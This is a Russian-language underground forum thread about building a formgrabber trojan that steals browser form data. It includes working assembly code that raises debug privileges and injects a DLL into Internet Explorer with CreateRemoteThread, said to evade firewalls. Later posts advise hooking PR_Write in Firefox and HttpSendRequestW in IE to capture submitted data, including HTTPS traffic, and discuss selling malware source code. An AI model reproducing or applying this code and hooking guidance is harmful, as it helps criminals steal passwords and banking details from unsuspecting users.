- Автор темы
- Добавить закладку
- #21
greenzy,спасибо,конечно,но там только бинарник,интересуют сорцы на дельфи,если есть у тебя-отпиши в пм или 648293679,могу и выкупить
-
XSS.stack #1 – первый литературный журнал от юзеров форума
"формграббер"
- Автор темы kalibr98
- Дата начала
DeusTirael
Тебе всё правильно обьяснил,всё прекрасно работает,фаерволы курят в сторонке.
Тебе всё правильно обьяснил,всё прекрасно работает,фаерволы курят в сторонке.
Код:
ieInject db 'IEXPLORE.EXE',0
pv db 'SeDebugPrivilege',0
dllName db 'ie.dll',0
NameSize = $-dllName
entry $
stdcall SetPrivilege,pv
stdcall Injectdll,ieInject
ret
proc SetPrivilege Priv
locals
hToken dd ?
tkp TOKEN_PRIVILEGES
luid LUID
endl
invoke OpenProcessToken,-1,0f01ffh,addr hToken
test eax,eax
je .exit
invoke LookupPrivilegeValue,0,[Priv],addr luid
test eax,eax
je .close
push [luid.LowPart]
pop [tkp.LowPart]
push [luid.HighPart]
pop [tkp.HighPart]
mov [tkp.Attributes],2
mov [tkp.PrivilegeCount],1
invoke AdjustTokenPrivileges,[hToken],0,addr tkp,10h,0,0
.close:
invoke CloseHandle,[hToken]
.exit:
ret
endp
proc Injectdll,Str
locals
pe PROCESSENTRY32
hSnap dd ?
endl
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov [hSnap],eax
mov [pe.dwSize],sizeof.PROCESSENTRY32
lea ebx,[pe]
invoke Process32First,[hSnap],ebx
cmp eax,0
je @f
next_process:
invoke Process32Next,[hSnap],ebx
cmp eax,0
je @f
lea eax,[pe.szExeFile]
invoke CharUpper,eax
invoke lstrcmpi,[Str],eax
cmp eax,0
jne next_process
mov eax,[pe.th32ProcessID]
stdcall ProcInject,eax
jmp next_process
@@:
ret
endp
proc ProcInject dwPid
invoke OpenProcess,PROCESS_ALL_ACCESS,0,[dwPid]
test eax,eax
jz @F
mov esi,eax
invoke VirtualAllocEx,esi,0,16,MEM_COMMIT or MEM_RESERVE,PAGE_READWRITE
test eax,eax
jz @F
mov edi,eax
invoke WriteProcessMemory,esi,edi,dllName,NameSize,0
test eax,eax
jz @F
invoke CreateRemoteThread,esi,0,0,[LoadLibrary],edi,0,0
invoke CloseHandle,esi
@@:
ret
endp- Автор темы
- Добавить закладку
- #23
еще бы понять как это в дельфи впихнуть.....
Ты не задумывался над тем чтоб начать писать этот проект на другом языке программирования ? Тема о том что малваре не пишется на делфи (за очень редким исключением) уже обсуждалась много раз. И дело не только в том что конь весит пол мегабайта...
Может стоит перевести проект на С++ пока он только зарождается ? На С++ примеров перехвата не меньше. И не намного он сложнее делфи. Для себя выбрал ассемблер и могу сказать что на нем тоже несложно писать. Асмщики больше запугивают новичков чтоб не было возмущения в Силе.
Может стоит перевести проект на С++ пока он только зарождается ? На С++ примеров перехвата не меньше. И не намного он сложнее делфи. Для себя выбрал ассемблер и могу сказать что на нем тоже несложно писать. Асмщики больше запугивают новичков чтоб не было возмущения в Силе.
полностью согласен, даже супер-пупер сорцы на делфи не так уж легко продать, даже за смешные деньги , тот же coban2k , который продает сорцы - делает уже готовую дллку для юзанья, видно что сорцы на делфях считанные единицы покупали
Что это за кони по пол мегабайта, с VCL чтоли?
- Автор темы
- Добавить закладку
- #27
задумывался,но проект живет уже более года,конь сейчас весит 150кв (без пожатия UPX-ом и иже с ним),а переписывать все ОТ и ДО тяжко,да и было все норм,только сейчас обнаружил что не перехватывается ФФ и ИЕ выше 6, вот думаю как исправить... :bang:
Впринципе,наверно,можно написать ДЛЛ на си например а работу с ней уже в дельфи.
Вобчим проблема актуальна.
Такой вопрос-я много лазил по гуглу,форумам в поисках решения этой задачи,всвязи с прочитанным у меня 2 вопроса:
1) как можно сделать локально работу браузера через прокси? (в нем уже можно будет перехватить все запросы)
2) можно ли до начала отправки запроса браузером посмотреть содержимое форм?
Т.е. к примеру в компоненте webbrowser есть свойство OnBeforeNavigate,можно ли что-то подобное сделать с ИЕ?
Впринципе,наверно,можно написать ДЛЛ на си например а работу с ней уже в дельфи.
Вобчим проблема актуальна.
Такой вопрос-я много лазил по гуглу,форумам в поисках решения этой задачи,всвязи с прочитанным у меня 2 вопроса:
1) как можно сделать локально работу браузера через прокси? (в нем уже можно будет перехватить все запросы)
2) можно ли до начала отправки запроса браузером посмотреть содержимое форм?
Т.е. к примеру в компоненте webbrowser есть свойство OnBeforeNavigate,можно ли что-то подобное сделать с ИЕ?
При таком подходе не будут видны данные переданные по протоколу https. А ведь они самые вкусные.
Можно. Вот статья http://www.exploit.in/forum/index.php?showtopic=267
А вот сорец к статье (на си) http://www.sendspace.com/file/r9x2es
Кстати только что просмотрел сорец. А что ж вы батенька неправильные API перехватываете то ? Для перехвата ФФ нужно хукать PR_Write а для осла HttpSendRequestW.
А у тебя как я понял только Send перехватывается. Это непохек.
А у тебя как я понял только Send перехватывается. Это непохек.
- Автор темы
- Добавить закладку
- #30
посмотрел сорцы,спс,думаю как перевести на дельфи. Оригинальный проект после запуска вылетает с ошибкой (отправлять\не отправлять в мелкософт)
А насчет PR_Write и HttpSendRequestW-только что попробовал,результат тот же...
А насчет PR_Write и HttpSendRequestW-только что попробовал,результат тот же...
Ни исходниках.ру есть сорцы на делфи для инжекта длл в процесс. Есть такой товарищ Роуз, у него есть свой ресурс на котором выложены его исходники.
Надо погуглить именно это.
Вот на вскидку первая ссылка из серпа гугла, это не то о чем я говорил, но этого говна немеряно в сети. Учти что эти техники воняют за километр!
Надо погуглить именно это.
Вот на вскидку первая ссылка из серпа гугла, это не то о чем я говорил, но этого говна немеряно в сети. Учти что эти техники воняют за километр!
- Автор темы
- Добавить закладку
- #32
я понимаю,но задача именно корректно перехватить запрос браузера,а длл внедрять в процесс я умею